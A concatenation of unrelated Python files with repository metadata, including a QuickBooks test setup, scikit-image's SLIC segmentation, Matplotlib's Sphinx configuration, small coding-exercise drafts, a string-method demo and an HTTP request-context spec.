class QuickbooksTestCase(TestCase):
def setUp(self):
super(QuickbooksTestCase, self).setUp()
self.auth_client = AuthClient(
client_id=os.environ.get('CLIENT_ID'),
client_secret=os.environ.get('CLIENT_SECRET'),
environment=Environments.SANDBOX,
redirect_uri='http://localhost:8000/callback',
)
self.qb_client = QuickBooks(
minorversion=59,
auth_client=self.auth_client,
refresh_token=os.environ.get('REFRESH_TOKEN'),
company_id=os.environ.get('COMPANY_ID'),
)
self.qb_client.sandbox = True
class QuickbooksUnitTestCase(TestCase):
def setUp(self):
super(QuickbooksUnitTestCase, self).setUp()
self.auth_client = AuthClient(
client_id='CLIENTID',
client_secret='CLIENT_SECRET',
environment=Environments.SANDBOX,
redirect_uri='http://localhost:8000/callback',
)
self.qb_client = QuickBooks(
#auth_client=self.auth_client,
refresh_token='REFRESH_TOKEN',
company_id='COMPANY_ID',
)
self.qb_client.sandbox = True
| [
"[email protected]"
] | |
843d5c4d45fddd036ed5fa1783b168dbde9b6640 | 52b5773617a1b972a905de4d692540d26ff74926 | /.history/binary_20200524140021.py | cad576ae530c25621bd03b09d3d763a13dba320b | [] | no_license | MaryanneNjeri/pythonModules | 56f54bf098ae58ea069bf33f11ae94fa8eedcabc | f4e56b1e4dda2349267af634a46f6b9df6686020 | refs/heads/master | 2022-12-16T02:59:19.896129 | 2020-09-11T12:05:22 | 2020-09-11T12:05:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,207 | py | def solution(N):
print(N)
maximumCount = 0
well = format(9,"b")
print("wow",well)
# while( N >= 1):
# N = int(N / 2)
# # print("this",N)
# print("N",N/2,"well",N%2)
# if N % 2 == 0 :
# binaryNumber.append(0)
# else:
# binaryNumber.append(1)
# then reverse the number
s = [str(i) for i in well]
binary = int("".join(s))
intialNumber = None
lastNumber = None
totalCount = 0
print("binary",str(binary))
print("number",number)
for i in range(len(str(binary))):
if number[i] == 1:
intialNumber = 1
if i < len(number)-1:
if number[i] == 0 and number[i+1] :
lastNumber = 1
if intialNumber is not None and lastNumber is not None and number[i] == 0:
maximumCount = maximumCount + 1
else:
totalCount = maximumCount
maximumCount = 0
# return 0
print("total",totalCount)
solution(9) | [
"[email protected]"
] | |
efd20d62075642d05d33586f9a2f19037598aa02 | ee41311a11a1c6baedafd9a914d5a1f8330fe8a9 | /SANEF_LIVE/venv/Lib/site-packages/skimage/segmentation/slic_superpixels.py | b196dbffc726dfb4cbf2e1da2a6e255d3901f1ec | [] | no_license | sethnanati/CodeRepoPython | 2dffb7263620bd905bf694f348485d894a9513db | b55e66611d19b35e9926d1b1387320cf48e177c8 | refs/heads/master | 2023-07-07T11:16:12.958401 | 2021-02-13T10:09:48 | 2021-02-13T10:09:48 | 376,531,283 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,799 | py | # coding=utf-8
from __future__ import division
import collections as coll
import numpy as np
from scipy import ndimage as ndi
from ..util import img_as_float, regular_grid
from ..segmentation._slic import (_slic_cython,
_enforce_label_connectivity_cython)
from ..color import rgb2lab
def slic(image, n_segments=100, compactness=10., max_iter=10, sigma=0,
spacing=None, multichannel=True, convert2lab=None,
enforce_connectivity=True, min_size_factor=0.5, max_size_factor=3,
slic_zero=False):
"""Segments image using k-means clustering in Color-(x,y,z) space.
Parameters
----------
image : 2D, 3D or 4D ndarray
Input image, which can be 2D or 3D, and grayscale or multichannel
(see `multichannel` parameter).
n_segments : int, optional
The (approximate) number of labels in the segmented output image.
compactness : float, optional
Balances color proximity and space proximity. Higher values give
more weight to space proximity, making superpixel shapes more
square/cubic. In SLICO mode, this is the initial compactness.
This parameter depends strongly on image contrast and on the
shapes of objects in the image. We recommend exploring possible
values on a log scale, e.g., 0.01, 0.1, 1, 10, 100, before
refining around a chosen value.
max_iter : int, optional
Maximum number of iterations of k-means.
sigma : float or (3,) array-like of floats, optional
Width of Gaussian smoothing kernel for pre-processing for each
dimension of the image. The same sigma is applied to each dimension in
case of a scalar value. Zero means no smoothing.
Note, that `sigma` is automatically scaled if it is scalar and a
manual voxel spacing is provided (see Notes section).
spacing : (3,) array-like of floats, optional
The voxel spacing along each image dimension. By default, `slic`
assumes uniform spacing (same voxel resolution along z, y and x).
This parameter controls the weights of the distances along z, y,
and x during k-means clustering.
multichannel : bool, optional
Whether the last axis of the image is to be interpreted as multiple
channels or another spatial dimension.
convert2lab : bool, optional
Whether the input should be converted to Lab colorspace prior to
segmentation. The input image *must* be RGB. Highly recommended.
This option defaults to ``True`` when ``multichannel=True`` *and*
``image.shape[-1] == 3``.
enforce_connectivity: bool, optional
Whether the generated segments are connected or not
min_size_factor: float, optional
Proportion of the minimum segment size to be removed with respect
to the supposed segment size ```depth*width*height/n_segments```
max_size_factor: float, optional
Proportion of the maximum connected segment size. A value of 3 works
in most of the cases.
slic_zero: bool, optional
Run SLIC-zero, the zero-parameter mode of SLIC. [2]_
Returns
-------
labels : 2D or 3D array
Integer mask indicating segment labels.
Raises
------
ValueError
If ``convert2lab`` is set to ``True`` but the last array
dimension is not of length 3.
Notes
-----
* If `sigma > 0`, the image is smoothed using a Gaussian kernel prior to
segmentation.
* If `sigma` is scalar and `spacing` is provided, the kernel width is
divided along each dimension by the spacing. For example, if ``sigma=1``
and ``spacing=[5, 1, 1]``, the effective `sigma` is ``[0.2, 1, 1]``. This
ensures sensible smoothing for anisotropic images.
* The image is rescaled to be in [0, 1] prior to processing.
* Images of shape (M, N, 3) are interpreted as 2D RGB images by default. To
interpret them as 3D with the last dimension having length 3, use
`multichannel=False`.
References
----------
.. [1] Radhakrishna Achanta, Appu Shaji, Kevin Smith, Aurelien Lucchi,
Pascal Fua, and Sabine Süsstrunk, SLIC Superpixels Compared to
State-of-the-art Superpixel Methods, TPAMI, May 2012.
.. [2] http://ivrg.epfl.ch/research/superpixels#SLICO
Examples
--------
>>> from skimage.segmentation import slic
>>> from skimage.data import astronaut
>>> img = astronaut()
>>> segments = slic(img, n_segments=100, compactness=10)
Increasing the compactness parameter yields more square regions:
>>> segments = slic(img, n_segments=100, compactness=20)
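    For anisotropic 3D data, ``spacing`` rescales distances along each axis
    (the values below are illustrative, not from a real dataset):
    >>> import numpy as np
    >>> vol = np.random.rand(10, 50, 50)  # hypothetical z, y, x volume
    >>> segments = slic(vol, n_segments=50, multichannel=False,
    ...                 spacing=[5, 1, 1])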
"""
image = img_as_float(image)
is_2d = False
if image.ndim == 2:
# 2D grayscale image
image = image[np.newaxis, ..., np.newaxis]
is_2d = True
elif image.ndim == 3 and multichannel:
# Make 2D multichannel image 3D with depth = 1
image = image[np.newaxis, ...]
is_2d = True
elif image.ndim == 3 and not multichannel:
# Add channel as single last dimension
image = image[..., np.newaxis]
if spacing is None:
spacing = np.ones(3)
elif isinstance(spacing, (list, tuple)):
spacing = np.array(spacing, dtype=np.double)
if not isinstance(sigma, coll.Iterable):
sigma = np.array([sigma, sigma, sigma], dtype=np.double)
sigma /= spacing.astype(np.double)
elif isinstance(sigma, (list, tuple)):
sigma = np.array(sigma, dtype=np.double)
if (sigma > 0).any():
# add zero smoothing for multichannel dimension
sigma = list(sigma) + [0]
image = ndi.gaussian_filter(image, sigma)
if multichannel and (convert2lab or convert2lab is None):
if image.shape[-1] != 3 and convert2lab:
raise ValueError("Lab colorspace conversion requires a RGB image.")
elif image.shape[-1] == 3:
image = rgb2lab(image)
depth, height, width = image.shape[:3]
# initialize cluster centroids for desired number of segments
grid_z, grid_y, grid_x = np.mgrid[:depth, :height, :width]
slices = regular_grid(image.shape[:3], n_segments)
step_z, step_y, step_x = [int(s.step if s.step is not None else 1)
for s in slices]
segments_z = grid_z[slices]
segments_y = grid_y[slices]
segments_x = grid_x[slices]
segments_color = np.zeros(segments_z.shape + (image.shape[3],))
segments = np.concatenate([segments_z[..., np.newaxis],
segments_y[..., np.newaxis],
segments_x[..., np.newaxis],
segments_color],
axis=-1).reshape(-1, 3 + image.shape[3])
segments = np.ascontiguousarray(segments)
# we do the scaling of ratio in the same way as in the SLIC paper
# so the values have the same meaning
step = float(max((step_z, step_y, step_x)))
ratio = 1.0 / compactness
image = np.ascontiguousarray(image * ratio)
labels = _slic_cython(image, segments, step, max_iter, spacing, slic_zero)
if enforce_connectivity:
segment_size = depth * height * width / n_segments
min_size = int(min_size_factor * segment_size)
max_size = int(max_size_factor * segment_size)
labels = _enforce_label_connectivity_cython(labels,
min_size,
max_size)
if is_2d:
labels = labels[0]
return labels
| [
"[email protected]"
] | |
24b01653afda42c4f298c4de77f67fe16d74d598 | 1d928c3f90d4a0a9a3919a804597aa0a4aab19a3 | /python/matplotlib/2017/12/conf.py | c89c9d2c773a8efd08213dff9656b75f7cfde32b | [] | no_license | rosoareslv/SED99 | d8b2ff5811e7f0ffc59be066a5a0349a92cbb845 | a062c118f12b93172e31e8ca115ce3f871b64461 | refs/heads/main | 2023-02-22T21:59:02.703005 | 2021-01-28T19:40:51 | 2021-01-28T19:40:51 | 306,497,459 | 1 | 1 | null | 2020-11-24T20:56:18 | 2020-10-23T01:18:07 | null | UTF-8 | Python | false | false | 18,382 | py | # -*- coding: utf-8 -*-
#
# Matplotlib documentation build configuration file, created by
# sphinx-quickstart on Fri May 2 12:33:25 2008.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# The contents of this file are pickled, so don't put values in the namespace
# that aren't pickleable (module imports are okay, they're removed automatically).
#
# All configuration values have a default value; values that are commented out
# serve to show the default value.
import matplotlib
import os
import sys
import sphinx
import six
from glob import glob
from sphinx_gallery.sorting import ExplicitOrder
# If your extensions are in another directory, add it here. If the directory
# is relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
sys.path.append(os.path.abspath('.'))
# General configuration
# ---------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['matplotlib.sphinxext.mathmpl', 'sphinxext.math_symbol_table',
'sphinx.ext.autodoc', 'matplotlib.sphinxext.only_directives',
'sphinx.ext.doctest', 'sphinx.ext.autosummary',
'sphinx.ext.inheritance_diagram', 'sphinx.ext.intersphinx',
'sphinx_gallery.gen_gallery',
'matplotlib.sphinxext.plot_directive',
'sphinxext.github',
'numpydoc']
exclude_patterns = ['api/api_changes/*', 'users/whats_new/*']
def _check_deps():
names = {"colorspacious": 'colorspacious',
"IPython.sphinxext.ipython_console_highlighting": 'ipython',
"matplotlib": 'matplotlib',
"numpydoc": 'numpydoc',
"PIL.Image": 'pillow',
"sphinx_gallery": 'sphinx_gallery'}
if sys.version_info < (3, 3):
names["mock"] = 'mock'
missing = []
for name in names:
try:
__import__(name)
except ImportError:
missing.append(names[name])
if missing:
raise ImportError(
"The following dependencies are missing to build the "
"documentation: {}".format(", ".join(missing)))
_check_deps()
try:
from unittest.mock import MagicMock
except ImportError:
from mock import MagicMock
# Use IPython's console highlighting by default
extensions.extend(['IPython.sphinxext.ipython_console_highlighting',
'IPython.sphinxext.ipython_directive'])
if six.PY2:
from distutils.spawn import find_executable
has_dot = find_executable('dot') is not None
else:
from shutil import which # Python >= 3.3
has_dot = which('dot') is not None
if not has_dot:
raise OSError(
"No binary named dot - you need to install the Graph Visualization "
"software (usually packaged as 'graphviz') to build the documentation")
autosummary_generate = True
autodoc_docstring_signature = True
autodoc_default_flags = ['members', 'undoc-members']
intersphinx_mapping = {
'python': ('https://docs.python.org/3', None),
'numpy': ('https://docs.scipy.org/doc/numpy/', None),
'scipy': ('https://docs.scipy.org/doc/scipy/reference/', None),
'pandas': ('https://pandas.pydata.org/pandas-docs/stable', None)
}
explicit_order_folders = [
'../examples/api',
'../examples/pyplots',
'../examples/subplots_axes_and_figures',
'../examples/color',
'../examples/statistics',
'../examples/lines_bars_and_markers',
'../examples/images_contours_and_fields',
'../examples/shapes_and_collections',
'../examples/text_labels_and_annotations',
'../examples/pie_and_polar_charts',
'../examples/style_sheets',
'../examples/axes_grid',
'../examples/showcase',
'../tutorials/introductory',
'../tutorials/intermediate',
'../tutorials/advanced']
for folder in sorted(glob('../examples/*') + glob('../tutorials/*')):
if not os.path.isdir(folder) or folder in explicit_order_folders:
continue
explicit_order_folders.append(folder)
# Sphinx gallery configuration
sphinx_gallery_conf = {
'examples_dirs': ['../examples', '../tutorials'],
'filename_pattern': '^((?!sgskip).)*$',
'gallery_dirs': ['gallery', 'tutorials'],
'doc_module': ('matplotlib', 'mpl_toolkits'),
'reference_url': {
'matplotlib': None,
'numpy': 'https://docs.scipy.org/doc/numpy',
'scipy': 'https://docs.scipy.org/doc/scipy/reference',
},
'backreferences_dir': 'api/_as_gen',
'subsection_order': ExplicitOrder(explicit_order_folders),
'min_reported_time': 1,
}
plot_gallery = 'True'
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# This is the default encoding, but it doesn't hurt to be explicit
source_encoding = "utf-8"
# The master toctree document.
master_doc = 'contents'
# General substitutions.
project = 'Matplotlib'
copyright = ('2002 - 2012 John Hunter, Darren Dale, Eric Firing, '
'Michael Droettboom and the Matplotlib development '
'team; 2012 - 2017 The Matplotlib development team')
# The default replacements for |version| and |release|, also used in various
# other places throughout the built documents.
#
# The short X.Y version.
version = matplotlib.__version__
# The full version, including alpha/beta/rc tags.
release = version
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
unused_docs = []
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
default_role = 'obj'
# Plot directive configuration
# ----------------------------
plot_formats = [('png', 100), ('pdf', 100)]
# Github extension
github_project_url = "https://github.com/matplotlib/matplotlib/"
# Options for HTML output
# -----------------------
# The style sheet to use for HTML and HTML Help pages. A file of that name
# must exist either in Sphinx' static/ path, or in one of the custom paths
# given in html_static_path.
#html_style = 'matplotlib.css'
html_style = 'mpl.css'
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# The name of an image file (within the static path) to place at the top of
# the sidebar.
#html_logo = 'logo.png'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If nonempty, this is the file name suffix for generated HTML files. The
# default is ``".html"``.
html_file_suffix = '.html'
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Content template for the index page.
html_index = 'index.html'
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Custom sidebar templates, maps page names to templates.
html_sidebars = {
'index': ['donate_sidebar.html', 'searchbox.html'],
'**': ['localtoc.html', 'relations.html',
'sourcelink.html', 'searchbox.html']
}
# If false, no module index is generated.
#html_use_modindex = True
html_domain_indices = ["py-modindex"]
# If true, the reST sources are included in the HTML build as _sources/<name>.
#html_copy_source = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it.
html_use_opensearch = 'False'
# Output file base name for HTML help builder.
htmlhelp_basename = 'Matplotlibdoc'
# Path to favicon
html_favicon = '_static/favicon.ico'
# Options for LaTeX output
# ------------------------
# The paper size ('letter' or 'a4').
latex_paper_size = 'letter'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, document class [howto/manual]).
latex_documents = [
('contents', 'Matplotlib.tex', 'Matplotlib',
'John Hunter, Darren Dale, Eric Firing, Michael Droettboom and the '
'matplotlib development team', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
latex_logo = None
latex_elements = {}
# Additional stuff for the LaTeX preamble.
latex_elements['preamble'] = r"""
% In the parameters section, place a newline after the Parameters
% header. (This is stolen directly from Numpy's conf.py, since it
% affects Numpy-style docstrings).
\usepackage{expdlist}
\let\latexdescription=\description
\def\description{\latexdescription{}{} \breaklabel}
\usepackage{amsmath}
\usepackage{amsfonts}
\usepackage{amssymb}
\usepackage{txfonts}
% The enumitem package provides unlimited nesting of lists and
% enums. Sphinx may use this in the future, in which case this can
% be removed. See
% https://bitbucket.org/birkenfeld/sphinx/issue/777/latex-output-too-deeply-nested
\usepackage{enumitem}
\setlistdepth{2048}
"""
latex_elements['pointsize'] = '11pt'
# Documents to append as an appendix to all manuals.
latex_appendices = []
# If false, no module index is generated.
latex_use_modindex = True
if hasattr(sphinx, 'version_info') and sphinx.version_info[:2] >= (1, 4):
latex_toplevel_sectioning = 'part'
else:
latex_use_parts = True
# Show both class-level docstring and __init__ docstring in class
# documentation
autoclass_content = 'both'
rst_epilog = """
.. |minimum_numpy_version| replace:: %s
""" % matplotlib.__version__numpy__
texinfo_documents = [
("contents", 'matplotlib', 'Matplotlib Documentation',
'John Hunter@*Darren Dale@*Eric Firing@*Michael Droettboom@*'
'The matplotlib development team',
'Matplotlib', "Python plotting package", 'Programming',
1),
]
class MyWX(MagicMock):
class Panel(object):
pass
class ToolBar(object):
pass
class Frame(object):
pass
VERSION_STRING = '2.9'
class MyPyQt4(MagicMock):
class QtGui(object):
# PyQt4.QtGui public classes.
# Generated with
# textwrap.fill([name for name in dir(PyQt4.QtGui)
# if isinstance(getattr(PyQt4.QtGui, name), type)])
_QtGui_public_classes = """\
Display QAbstractButton QAbstractGraphicsShapeItem
QAbstractItemDelegate QAbstractItemView QAbstractPrintDialog
QAbstractProxyModel QAbstractScrollArea QAbstractSlider
QAbstractSpinBox QAbstractTextDocumentLayout QAction QActionEvent
QActionGroup QApplication QBitmap QBoxLayout QBrush QButtonGroup
QCalendarWidget QCheckBox QClipboard QCloseEvent QColor QColorDialog
QColumnView QComboBox QCommandLinkButton QCommonStyle QCompleter
QConicalGradient QContextMenuEvent QCursor QDataWidgetMapper QDateEdit
QDateTimeEdit QDesktopServices QDesktopWidget QDial QDialog
QDialogButtonBox QDirModel QDockWidget QDoubleSpinBox QDoubleValidator
QDrag QDragEnterEvent QDragLeaveEvent QDragMoveEvent QDropEvent
QErrorMessage QFileDialog QFileIconProvider QFileOpenEvent
QFileSystemModel QFocusEvent QFocusFrame QFont QFontComboBox
QFontDatabase QFontDialog QFontInfo QFontMetrics QFontMetricsF
QFormLayout QFrame QGesture QGestureEvent QGestureRecognizer QGlyphRun
QGradient QGraphicsAnchor QGraphicsAnchorLayout QGraphicsBlurEffect
QGraphicsColorizeEffect QGraphicsDropShadowEffect QGraphicsEffect
QGraphicsEllipseItem QGraphicsGridLayout QGraphicsItem
QGraphicsItemAnimation QGraphicsItemGroup QGraphicsLayout
QGraphicsLayoutItem QGraphicsLineItem QGraphicsLinearLayout
QGraphicsObject QGraphicsOpacityEffect QGraphicsPathItem
QGraphicsPixmapItem QGraphicsPolygonItem QGraphicsProxyWidget
QGraphicsRectItem QGraphicsRotation QGraphicsScale QGraphicsScene
QGraphicsSceneContextMenuEvent QGraphicsSceneDragDropEvent
QGraphicsSceneEvent QGraphicsSceneHelpEvent QGraphicsSceneHoverEvent
QGraphicsSceneMouseEvent QGraphicsSceneMoveEvent
QGraphicsSceneResizeEvent QGraphicsSceneWheelEvent
QGraphicsSimpleTextItem QGraphicsTextItem QGraphicsTransform
QGraphicsView QGraphicsWidget QGridLayout QGroupBox QHBoxLayout
QHeaderView QHelpEvent QHideEvent QHoverEvent QIcon QIconDragEvent
QIconEngine QIconEngineV2 QIdentityProxyModel QImage QImageIOHandler
QImageReader QImageWriter QInputContext QInputContextFactory
QInputDialog QInputEvent QInputMethodEvent QIntValidator QItemDelegate
QItemEditorCreatorBase QItemEditorFactory QItemSelection
QItemSelectionModel QItemSelectionRange QKeyEvent QKeyEventTransition
QKeySequence QLCDNumber QLabel QLayout QLayoutItem QLineEdit
QLinearGradient QListView QListWidget QListWidgetItem QMainWindow
QMatrix QMatrix2x2 QMatrix2x3 QMatrix2x4 QMatrix3x2 QMatrix3x3
QMatrix3x4 QMatrix4x2 QMatrix4x3 QMatrix4x4 QMdiArea QMdiSubWindow
QMenu QMenuBar QMessageBox QMimeSource QMouseEvent
QMouseEventTransition QMoveEvent QMovie QPageSetupDialog QPaintDevice
QPaintEngine QPaintEngineState QPaintEvent QPainter QPainterPath
QPainterPathStroker QPalette QPanGesture QPen QPicture QPictureIO
QPinchGesture QPixmap QPixmapCache QPlainTextDocumentLayout
QPlainTextEdit QPolygon QPolygonF QPrintDialog QPrintEngine
QPrintPreviewDialog QPrintPreviewWidget QPrinter QPrinterInfo
QProgressBar QProgressDialog QProxyModel QPushButton QPyTextObject
QQuaternion QRadialGradient QRadioButton QRawFont QRegExpValidator
QRegion QResizeEvent QRubberBand QScrollArea QScrollBar
QSessionManager QShortcut QShortcutEvent QShowEvent QSizeGrip
QSizePolicy QSlider QSortFilterProxyModel QSound QSpacerItem QSpinBox
QSplashScreen QSplitter QSplitterHandle QStackedLayout QStackedWidget
QStandardItem QStandardItemModel QStaticText QStatusBar
QStatusTipEvent QStringListModel QStyle QStyleFactory QStyleHintReturn
QStyleHintReturnMask QStyleHintReturnVariant QStyleOption
QStyleOptionButton QStyleOptionComboBox QStyleOptionComplex
QStyleOptionDockWidget QStyleOptionDockWidgetV2 QStyleOptionFocusRect
QStyleOptionFrame QStyleOptionFrameV2 QStyleOptionFrameV3
QStyleOptionGraphicsItem QStyleOptionGroupBox QStyleOptionHeader
QStyleOptionMenuItem QStyleOptionProgressBar QStyleOptionProgressBarV2
QStyleOptionRubberBand QStyleOptionSizeGrip QStyleOptionSlider
QStyleOptionSpinBox QStyleOptionTab QStyleOptionTabBarBase
QStyleOptionTabBarBaseV2 QStyleOptionTabV2 QStyleOptionTabV3
QStyleOptionTabWidgetFrame QStyleOptionTabWidgetFrameV2
QStyleOptionTitleBar QStyleOptionToolBar QStyleOptionToolBox
QStyleOptionToolBoxV2 QStyleOptionToolButton QStyleOptionViewItem
QStyleOptionViewItemV2 QStyleOptionViewItemV3 QStyleOptionViewItemV4
QStylePainter QStyledItemDelegate QSwipeGesture QSyntaxHighlighter
QSystemTrayIcon QTabBar QTabWidget QTableView QTableWidget
QTableWidgetItem QTableWidgetSelectionRange QTabletEvent
QTapAndHoldGesture QTapGesture QTextBlock QTextBlockFormat
QTextBlockGroup QTextBlockUserData QTextBrowser QTextCharFormat
QTextCursor QTextDocument QTextDocumentFragment QTextDocumentWriter
QTextEdit QTextFormat QTextFragment QTextFrame QTextFrameFormat
QTextImageFormat QTextInlineObject QTextItem QTextLayout QTextLength
QTextLine QTextList QTextListFormat QTextObject QTextObjectInterface
QTextOption QTextTable QTextTableCell QTextTableCellFormat
QTextTableFormat QTimeEdit QToolBar QToolBox QToolButton QToolTip
QTouchEvent QTransform QTreeView QTreeWidget QTreeWidgetItem
QTreeWidgetItemIterator QUndoCommand QUndoGroup QUndoStack QUndoView
QVBoxLayout QValidator QVector2D QVector3D QVector4D QWhatsThis
QWhatsThisClickedEvent QWheelEvent QWidget QWidgetAction QWidgetItem
QWindowStateChangeEvent QWizard QWizardPage QWorkspace
QX11EmbedContainer QX11EmbedWidget QX11Info
"""
for _name in _QtGui_public_classes.split():
locals()[_name] = type(_name, (), {})
del _name
class MySip(MagicMock):
def getapi(*args):
return 1
mockwxversion = MagicMock()
mockwx = MyWX()
mocksip = MySip()
mockpyqt4 = MyPyQt4()
sys.modules['wxversion'] = mockwxversion
sys.modules['wx'] = mockwx
sys.modules['sip'] = mocksip
sys.modules['PyQt4'] = mockpyqt4
# numpydoc config
numpydoc_show_class_members = False
# Skip deprecated members
def skip_deprecated(app, what, name, obj, skip, options):
if skip:
return skip
skipped = {"matplotlib.colors": ["ColorConverter", "hex2color", "rgb2hex"]}
skip_list = skipped.get(getattr(obj, "__module__", None))
if skip_list is not None:
return getattr(obj, "__name__", None) in skip_list
def setup(app):
app.connect('autodoc-skip-member', skip_deprecated)
| [
"[email protected]"
] | |
0a20a0a7c7b6b3c688405d2ef7bcee0b30ed230f | ee3e0a69093e82deff1bddf607f6ce0dde372c48 | /coding_test/카카오 인턴/num_4.py | 226a287c788a6bf68f50fcecbe70e1a4d17bfa7e | [] | no_license | cndqjacndqja/algorithm_python | 202f9990ea367629aecdd14304201eb6fa2aa37e | 843269cdf8fb9d4c215c92a97fc2d007a8f96699 | refs/heads/master | 2023-06-24T08:12:29.639424 | 2021-07-24T05:08:46 | 2021-07-24T05:08:46 | 255,552,956 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 647 | py | from heapq import heappush, heappop
INF = int(1e9)
def solution(n, start, end, roads, traps):
data = [[] for _ in range(n+1)]
for i in roads:
a, b, c = i
data[a].append((b, c))
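    # Plain Dijkstra over the adjacency list built above; note that the
    # traps list is not handled in this partial attempt.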
def dijkstra(start, end, n, data):
distance = [INF for _ in range(n+1)]
distance[start] = 0
q = []
heappush(q, (0, start))
while q:
dis, node = heappop(q)
if distance[node] < dis:
continue
for i in data[node]:
cost = dis + i[1]
if distance[i[0]] > cost:
heappush(q, (cost, i[0]))
distance[i[0]] = cost
        return distance[end]
    return dijkstra(start, end, n, data)
| [
"[email protected]"
] | |
4489ddbba60f18b2f96f68362668c0918617c6d0 | e96cc817c768915eeff46027ded14e759e8042ff | /Python基础/字符串/判断.py | a08d4cb40f7a539f93ede6b04ae4724cf9c0e573 | [] | no_license | fovegage/learn-python | e22a32207cf513ba0f8c3428e9c00138987c2359 | 93b8d3513769a0b7d492a7b515f289fe3f1efc4a | refs/heads/master | 2023-06-08T13:44:57.274677 | 2023-05-29T05:52:35 | 2023-05-29T05:52:35 | 148,493,932 | 6 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,187 | py | # -*- coding: utf-8 -*-
# @Time : 2018/12/27 14:45
# @Author : fovegage
# @Email : [email protected]
# @File : 判断.py
# @Software: PyCharm
# islower() considers only cased (alphabetic) characters
str = 'hello'
print(str.islower())
# isalnum() checks whether the string consists of letters and digits only
str = 'jjjssss22'
print(str.isalnum())
# isalpha() checks that the string contains letters only; returns False otherwise
str = 'sjsksk'
print(str.isalpha())
# isdecimal() returns True if every character is a decimal digit, otherwise False
demo = '1234'
print(demo.isdecimal())
# isidentifier() checks for a valid Python identifier: letters, digits and underscores, not starting with a digit
str = '90'
print(str.isidentifier()) # False
# islower() checks whether all cased characters are lowercase
str = 'Tskksks'
print(str.islower()) # False
# isdigit() checks whether every character is a digit
num = '999'
print(num.isdigit())
# isspace() returns True only for whitespace such as spaces and tabs; note that '' and ' ' are different
str = '\t'
print(str.isspace())
# istitle() checks whether the string is titlecased (each word starts with an uppercase letter)
str = 'dTg'
print(str.istitle())
# isnumeric() returns True if all characters are numeric; an enhanced isdigit() that also accepts '²3455'
s = '\u00B23455'
print(repr(s))
print(s.isnumeric()) | [
"[email protected]"
] | |
de75179eb73337e3b223f1e9b50d70bc2438f591 | b2d2ce1752ec5ea39b70ae37551bc162a748b469 | /tests/unit/pypyraws/version_test.py | 4ec7ddabcd59da582daa199da4ef6a25a4c6a7b9 | [
"Apache-2.0"
] | permissive | AvdN/pypyr-aws | 05c28abb904e2f71a0fbdaacaeaf20b458f97c52 | 96477b2deb46b6db73fa6d64f1350991dd378c31 | refs/heads/master | 2021-01-24T06:46:41.130069 | 2017-06-02T15:03:15 | 2017-06-02T15:03:15 | 93,318,585 | 0 | 0 | null | 2017-06-04T14:23:52 | 2017-06-04T14:23:52 | null | UTF-8 | Python | false | false | 319 | py | """version.py unit tests."""
import pypyraws.version
import platform
def test_get_version():
actual = pypyraws.version.get_version()
expected = (f'pypyraws {pypyraws.version.__version__} '
f'python {platform.python_version()}')
assert actual == expected, "version not returning correctly"
| [
"[email protected]"
] | |
da5e68cfc1a7005a1e829bc6a913fac6fd2f1f7d | 1e263d605d4eaf0fd20f90dd2aa4174574e3ebce | /components/ally-http/ally/http/spec/server.py | 6712ab685dee0fe68395d0005537a4483bf101b2 | [] | no_license | galiminus/my_liveblog | 698f67174753ff30f8c9590935d6562a79ad2cbf | 550aa1d0a58fc30aa9faccbfd24c79a0ceb83352 | refs/heads/master | 2021-05-26T20:03:13.506295 | 2013-04-23T09:57:53 | 2013-04-23T09:57:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,564 | py | '''
Created on Jun 1, 2012
@package: ally http
@copyright: 2012 Sourcefabric o.p.s.
@license: http://www.gnu.org/licenses/gpl-3.0.txt
@author: Gabriel Nistor
Provides HTTP server specification.
'''
from ally.design.context import Context, defines, requires, optional
from ally.support.util_io import IInputStream
from collections import Iterable
import abc
# --------------------------------------------------------------------
# HTTP methods.
METHOD_GET = 'GET'
METHOD_DELETE = 'DELETE'
METHOD_POST = 'POST'
METHOD_PUT = 'PUT'
METHOD_OPTIONS = 'OPTIONS'
METHOD_UNKNOWN = 'UNKNOWN'
METHODS = frozenset((METHOD_GET, METHOD_DELETE, METHOD_POST, METHOD_PUT, METHOD_OPTIONS))
# --------------------------------------------------------------------
class RequestHTTP(Context):
'''
Context for HTTP request data.
'''
# ---------------------------------------------------------------- Defined
scheme = defines(str, doc='''
@rtype: string
The scheme URI protocol name to be used for the response.
''')
methodName = defines(str, doc='''
@rtype: string
The HTTP method name of the request.
''')
uriRoot = defines(str, doc='''
@rtype: string
The root URI to be considered for constructing a request path, basically the relative path root.
''')
uri = defines(str, doc='''
@rtype: string
The relative request URI.
''')
parameters = defines(list, doc='''
@rtype: list[tuple(string, string)]
The parameters of the request.
''')
headers = defines(dict, doc='''
@rtype: dictionary{string, string}
The raw headers.
''')
class RequestContentHTTP(Context):
'''
